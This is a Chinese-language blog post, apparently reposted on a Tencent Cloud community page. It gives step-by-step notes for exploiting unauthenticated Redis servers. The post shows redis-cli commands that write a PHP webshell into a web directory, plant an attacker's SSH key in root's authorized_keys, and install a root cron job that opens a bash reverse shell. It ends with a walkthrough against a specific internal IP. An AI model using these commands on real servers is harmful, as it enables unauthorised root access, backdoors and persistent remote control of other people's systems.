6月份作业之redis未授权漏洞利用

偶然发现某大佬博客说了一下Redis的漏洞,便整理了一下笔记,并做了实战测试0x00 笔记

1.写入webshell

dir=绝对路径

dbfilename="1.php"

2.写入ssh公钥匙

本机生成公钥 sshssh-keygen-trsa-C"test@test"

dir=/root/.ssh/

dbfilename=authorized_keys

\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCV6En/yo9BrY7ba0BsiFbg2hxLVdNerk1r3oKU1V0qeVMzRG8WdXkAiEXcvcmei1c85gPXDK3bqUX1XyLOy+hXfnTRRGfbMPOCclyoT/L3xeS1KMvWlP0qJVip7Mz+gwCEkQxSbZqdzBHStSFgAzoeGf12wUKEHLEpX7x7bs03vMUB8z7i1f10N+is84THQ4lMCpG4w3+CdeOKEssL2nL5abRhItjrfYgQH5cxtpwq55w97mVQ7PR9U2JSQSVWMTxy3rTx+7QP4JI2RS5yDRsjH4ISVwvu3gGyYAPfa6yofK+jjqChkyX4ipmTP9hAXf7lEvoZClVjCAwg1qslKieH aariz@el8.land\n\n\n\n

3.写入定时任务,反弹shell

dir=/var/spool/cron

dbfilename=root

setcrack"\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/ip/port 0>&1\n\n"0x01 实战测试使用redisk客户端链接远程主机端口

IP打码了(这码打得不错吧)拿WEBSHELL过程:

configsetdir 网站绝对路径

configsetdbfilename info.php //设置info.php为备份文件

setweb''//写入一句话到info.php

save //保存,然后即可通过菜刀url链接info.php即可最后Getshell:

0x0000 补充

ssh-keygen -t rsa

输入保存路径

输入密码:dyboy

重复输入密码:dyboy

saved in /root/.ssh/id_rsa.

key has been saved in /root/.ssh/id_rsa.pub.

将公钥写入foo.txt

(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > /tmp/foo.txt

执行命令:

cat /tmp/foo.txt | /usr/redis/redis-cli -h 172.16.12.2 -p 6379 -x set crackit

回显OK

连接主机,进入shell:

/usr/redis/redis-cli -h 172.16.12.2 -p 6379

config set dir /root/.ssh/

config set dbfilename "authorized_keys"

save

exit

通过ssh链接主机

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20180625G008QK00?refer=cp_1026
  • 腾讯「云+社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。

同媒体快讯

扫码关注云+社区

领取腾讯云代金券

玩转腾讯云 有奖征文活动